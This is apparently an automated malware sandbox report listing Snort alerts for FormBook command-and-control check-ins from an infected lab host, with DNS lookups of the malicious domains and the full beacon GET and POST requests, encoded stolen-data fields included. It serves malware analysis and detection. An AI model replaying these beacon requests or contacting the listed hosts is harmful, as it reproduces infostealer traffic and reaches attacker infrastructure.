            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59401 -> 89.31.143.90:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59407 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59408 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59410 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59411 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59412 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59414 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59416 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59417 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59419 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59420 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59421 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59423 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59424 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59426 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59428 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59429 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59430 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59432 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59433 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59434 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59436 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59437 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59438 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59440 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59441 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59442 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59445 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59446 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59447 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59449 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59450 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59451 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59453 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59454 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59455 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59457 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59458 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59459 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59461 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59462 -> 89.31.143.90:80
            Source: DNS query: www.vertilehub.xyz
            Source: Joe Sandbox ViewIP Address: 23.105.172.12 23.105.172.12
            Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.limpiezasbarcelo.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.top65s.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.videos60.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vertilehub.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.xuzfceth.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /expp/?Z6ZTG=4RP2jfjc/CKkP2k0VFIzhmOcoxlGKDo9u/ZkfjmOk/GcJdogV5u478VHpy4Tx1zZR2PffU9j3QXLxJ/zQp1CY/gImr6l8nbjZW8kbJ4UJqZmHhNvkenHenANmOUPEa0Yb7H7CBE=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.primefindsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.salecost.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bayviewcribbage.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficDNS traffic detected: DNS query: www.le-kuk.shop
            Source: global trafficDNS traffic detected: DNS query: www.limpiezasbarcelo.com
            Source: global trafficDNS traffic detected: DNS query: www.top65s.com
            Source: global trafficDNS traffic detected: DNS query: www.videos60.com
            Source: global trafficDNS traffic detected: DNS query: www.vertilehub.xyz
            Source: global trafficDNS traffic detected: DNS query: www.theestrellastore.com
            Source: global trafficDNS traffic detected: DNS query: www.xuzfceth.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: global trafficDNS traffic detected: DNS query: www.primefindsstore.shop
            Source: global trafficDNS traffic detected: DNS query: www.ecurtiscustoms.com
            Source: global trafficDNS traffic detected: DNS query: www.salecost.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.bayviewcribbage.com
            Source: unknownHTTP traffic detected: POST /utkc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.limpiezasbarcelo.comOrigin: http://www.limpiezasbarcelo.comConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 210Referer: http://www.limpiezasbarcelo.com/utkc/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 73 4f 77 7a 64 36 39 30 46 35 65 7a 51 72 70 31 77 34 4d 74 6b 4b 74 49 5a 61 79 6e 73 62 30 67 56 67 6c 74 38 64 69 2b 57 69 73 4c 4a 2b 78 6b 43 72 4a 55 32 4a 6b 38 4d 58 4b 48 53 6e 46 69 6e 4a 35 42 57 6e 4d 42 56 42 77 46 34 41 4a 2b 5a 33 34 4a 67 31 68 72 6f 49 51 59 32 37 4d 62 41 33 32 57 64 6c 62 4f 77 59 5a 56 73 50 4c 4d 52 6e 4d 30 33 6f 6f 55 4b 79 54 46 4b 64 43 4d 72 74 49 67 33 65 2f 31 35 50 51 68 79 4b 47 38 44 47 71 54 56 66 2b 2b 7a 64 50 32 4d 6e 76 4a 36 6e 6a 48 62 74 6a 43 79 58 6b 74 35 78 33 43 72 31 6f 4b 48 69 51 45 62 73 32 6b 66 6d 77 Data Ascii: Z6ZTG=8WKSZfXdpAc56sOwzd690F5ezQrp1w4MtkKtIZaynsb0gVglt8di+WisLJ+xkCrJU2Jk8MXKHSnFinJ5BWnMBVBwF4AJ+Z34Jg1hroIQY27MbA32WdlbOwYZVsPLMRnM03ooUKyTFKdCMrtIg3e/15PQhyKG8DGqTVf++zdP2MnvJ6njHbtjCyXkt5x3Cr1oKHiQEbs2kfmw
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:17 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 